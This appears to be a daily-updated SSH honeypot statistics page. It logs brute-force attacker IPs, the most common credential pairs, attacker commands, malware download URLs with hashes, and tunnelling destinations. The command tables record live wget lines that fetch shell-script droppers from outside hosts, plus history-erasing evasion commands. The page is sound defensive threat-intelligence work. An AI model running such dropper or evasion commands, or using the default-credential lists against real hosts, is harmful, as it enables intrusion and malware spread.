Honeypot SSH

This page is updated daily. Last update: 2019-01-01 23:02:24 UTC

The following SSH blacklists (updated every day, in text format) contain the IP addresses of hosts that tried to brute-force their way into my honeypot located in Italy.
Consider using Detux to analyze Linux malware on the x86, x86-64, ARM, MIPS and MIPSEL CPU architectures.

Monthly SSH login attempts

Attackers blacklists (IP address)

24 hours (txt), week (txt), year (txt)

Statistics - 2019

Unique IP address: 89
Unique username: 190
Unique password: 421

Other information

Latest files downloaded
All passwords ordered by length (txt)
All client versions (txt)

Latest commands executed

Timestamp            Command                                                Success  IP address     AS     AS Org                                  Country
2019-01-01 19:58:58  cd /tmp || cd /var/run || cd /mnt || cd /root || cd /  ok       46.101.5.138   14061  DIGITALOCEAN-ASN DigitalOcean, LLC, US  GB
2019-01-01 19:58:58  wget http://178.62.71.110/bins.sh                      ok       46.101.5.138   14061  DIGITALOCEAN-ASN DigitalOcean, LLC, US  GB
2019-01-01 19:58:54  cd /tmp || cd /var/run || cd /mnt || cd /root || cd /  ok       46.101.5.138   14061  DIGITALOCEAN-ASN DigitalOcean, LLC, US  GB
2019-01-01 19:58:54  wget http://178.62.71.110/bins.sh                      ok       46.101.5.138   14061  DIGITALOCEAN-ASN DigitalOcean, LLC, US  GB
2019-01-01 17:46:33  cd /tmp || cd /var/run || cd /mnt || cd /root || cd /  ok       46.101.5.138   14061  DIGITALOCEAN-ASN DigitalOcean, LLC, US  GB
2019-01-01 17:46:33  wget http://178.62.71.110/bins.sh                      ok       46.101.5.138   14061  DIGITALOCEAN-ASN DigitalOcean, LLC, US  GB
2019-01-01 16:49:02  cat /proc/cpuinfo                                      ok       106.12.81.245  38365  CNNIC-BAIDU-AP Beijing Ba...            UNK
2019-01-01 16:49:01  ps -x                                                  ok       106.12.81.245  38365  CNNIC-BAIDU-AP Beijing Ba...            UNK
2019-01-01 16:48:59  free -m                                                ok       106.12.81.245  38365  CNNIC-BAIDU-AP Beijing Ba...            UNK
2019-01-01 16:48:58  uname                                                  ok       106.12.81.245  38365  CNNIC-BAIDU-AP Beijing Ba...            UNK

Latest URL

Timestamp            URL                            Shasum - VirusTotal analysis
2019-01-01 20:58:58  hxxp://178.62.71.110/bins.sh   38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff
2019-01-01 20:58:55  hxxp://178.62.71.110/bins.sh   38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff
2019-01-01 18:46:34  hxxp://178.62.71.110/bins.sh   38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff
2019-01-01 17:16:09  hxxp://142.93.163.129/8UsA.sh  f8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 17:16:09  hxxp://142.93.163.129/8UsA.sh  f8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 17:07:24  hxxp://142.93.163.129/8UsA.sh  f8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 17:07:24  hxxp://142.93.163.129/8UsA.sh  f8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 12:00:58  hxxp://35.227.55.119/bins.sh   9316b6583c781ceb7195ca8b8ecf85493eb2402d9cdef8fa1685fd5e2ab5ad0f
2018-12-30 18:23:13  hxxp://142.11.216.61/8UsA.sh   10057669803252d81668efa171787bad1f366b9a82028b34fcb588f74c43c201
2018-12-30 18:23:10  hxxp://142.11.216.61/8UsA.sh   10057669803252d81668efa171787bad1f366b9a82028b34fcb588f74c43c201

Latest VirusTotal analysis

Datetime    Filename (shasum) - VirusTotal analysis                           Virustotal scan date  Virustotal results  File type                                         File size
2019-01-02  38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.8K
2019-01-02  f8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92  -                     0/0                 Bourne-Again shell script, ASCII text executable  2.0K
2018-12-31  10057669803252d81668efa171787bad1f366b9a82028b34fcb588f74c43c201  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.9K
2018-12-31  024c6d261246e27b2918182ed0f218cb522277ed6985cad08ef2c25dab9c6c22  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.9K
2018-12-30  9913abb58d8229c08cd296dba05d2b2537fdf31946871744e91fd5be44b51228  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.8K
2018-12-30  931310ff0c6182d2db47199cb3ff2bed6ab68fe69c8c3fc64698026768cf1d36  -                     0/0                 ASCII text                                        2.1K
2018-12-30  f4547555854921023b39dbb4fd8878161e814944bcbd906818cdef2cdc12d3a0  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.8K
2018-12-30  e40340560688e197d080cac679b49b9903407eff4bdf5d9680467927aa2e8d16  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.9K
2018-12-29  0799fcfdc322332908349029f1b4dc4b5ec413f7b08b47d9dc0849c005198298  -                     0/0                 Bourne-Again shell script, ASCII text executable  2.0K
2018-12-29  45d6f0241c08a54820ba3391dba06bf06d2ddcc72155f4af9b68565220fca1d6  -                     0/0                 Bourne-Again shell script, ASCII text executable  1.8K

Top most sessions per distinct IP address - 2019

IP Address       AS     AS Org                        Country
5.188.87.52      57172  GLOBALLAYER, NL               RU
5.188.87.49      57172  GLOBALLAYER, NL               RU
109.248.9.105    58222  SOLAR-AS, GB                  RU
109.248.9.103    58222  SOLAR-AS, GB                  RU
5.188.86.211     49453  GLOBALLAYER, NL               RU
5.188.87.51      57172  GLOBALLAYER, NL               RU
5.188.87.54      57172  GLOBALLAYER, NL               RU
175.111.117.218  46026  BBT-AS-ID BATAM BINTAN TE...  ID
5.188.87.55      57172  GLOBALLAYER, NL               RU
5.188.87.53      57172  GLOBALLAYER, NL               RU

Login attempts last 10 days

Date        Occurrences
2019-01-02  43
2019-01-01  4671
2018-12-31  4144
2018-12-30  4775
2018-12-29  2563
2018-12-28  703
2018-12-26  4028
2018-12-25  4049
2018-12-24  4588
2018-12-23  5009

Top username - 2019

Username
root
admin
nagios
user
test
git
1234
ubnt
ftpuser
support

Top password - 2019

Password
root
123456
nagios
admin
1234
password
ubnt
123
user
default

Top username/password - 2019

Username / Password
root / root
nagios / nagios
admin / admin
ubnt / ubnt
user / user
root / 123456
root / admin
admin / password
support / support
admin / 123456

Top commands - 2019

Command
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://178.62.71.110/bins.sh
cd /tmp
echo '' > DIRTEST || cd /var
echo '' > DIRTEST
wget http://142.93.163.129/8UsA.sh
wget http://35.227.55.119/bins.sh
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null

Top tunnelling port - 2019

Port #

Top tunnelling IP address - 2019

IP address            DNS                                                  AS     AS Org                                   Country  #
ya.ru                 n/a                                                  -      -                                        UNK      2238
104.108.66.58         a104-108-66-58.deploy.static.akamaitechnologies.com  16625  AKAMAI-AS Akamai Technologies, Inc., US  US       228
65.55.33.119          n/a                                                  8075   MICROSOFT-CORP-MSN-AS-BLO...             US       138
65.55.92.152          n/a                                                  8075   MICROSOFT-CORP-MSN-AS-BLO...             US       106
192.108.239.107       video-weaver.ams02.hls.ttvnw.net                     46489  JUSTINTV Twitch Interactive Inc., US     US       98
207.46.8.167          bay0-mc5-f.bay0.hotmail.com                          8075   MICROSOFT-CORP-MSN-AS-BLO...             US       93
registrace.seznam.cz  bay0-mc5-f.bay0.hotmail.com                          -      -                                        UNK      91
66.196.118.35         UNKNOWN-66-196-118-X.yahoo.com                       26101  YAHOO-3 Yahoo!, US                       US       82
66.196.118.33         UNKNOWN-66-196-118-X.yahoo.com                       26101  YAHOO-3 Yahoo!, US                       US       76
65.55.92.136          mx1.hotmail.com                                      8075   MICROSOFT-CORP-MSN-AS-BLO...             US       74